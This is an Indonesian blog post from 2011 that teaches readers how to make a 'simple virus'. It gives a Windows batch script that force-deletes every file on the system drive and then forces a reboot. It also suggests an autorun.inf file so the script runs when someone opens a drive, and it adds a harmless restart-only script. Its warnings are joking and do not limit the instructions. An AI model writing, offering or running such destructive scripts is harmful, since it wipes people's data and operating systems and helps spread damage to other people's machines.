Minggu, 14 Agustus 2011

Membuat Virus Sederhana

Diposkan oleh Dita di 10.58
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain.
Nah, kali ini saya akan memberikan salah satu contoh untuk membuat contoh program virus (lebih tepat disebut program perusak) yang sangat sederhana. Program ini akan mengapus seluruh folder dan file pada suatu drive.
 
Mohon jangan mencoba pada komputer orang lain……….Virus ini sangat berbahaya. Sebelum mencoba, sebaiknya anda backup dulu data-data Anda… he..he… Setelah menjalankan program ini, sistem operasi Anda tidak akan ada lagi, sehingga Anda harus install ulang lagi (capee. deh…). So, ngga usah nyoba deh…ck..ckk..
Ketik program berikut dengan notepad, dan simpan dengan ekstensi bat, misalnya virus.bat

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

PERHATIAN : Program ini akan menghapus sistem Anda , makanya berhati-hatilah. Saya tidak bertanggung jawab atas semua yang terjadi, silahkan tanggung resiko sendiri.. ck..ckk..
Sebagai tambahan, Anda dapat juga menggunakan kode program berikut. Perintah ini hanya akan me-restart komputer Anda.. Anda aman untuk mencobanya. Sama seperti program virus.bat, program di bawah ini juga harus disimpan dengan ekstensi .bat, misalnya restart.bat

@echo off
shutdown -r -f -t 00

Anda dapat berimprovisasi dengan menambahkan sebuah file autorun.inf file untuk menjalankan program tersebut ketika seseorang melakukan klik ganda pada sebuah drive. SELAMAT MENCOBA.
“Gunakanlah ilmu untuk kebaikan, jangan gunakan untuk kejahatan dan gagah-gagahan”.
 

0 komentar:

Poskan Komentar

 

Libra_Line Copyright © 2010 Design by Ipietoon Blogger Template Graphic from Enakei | web hosting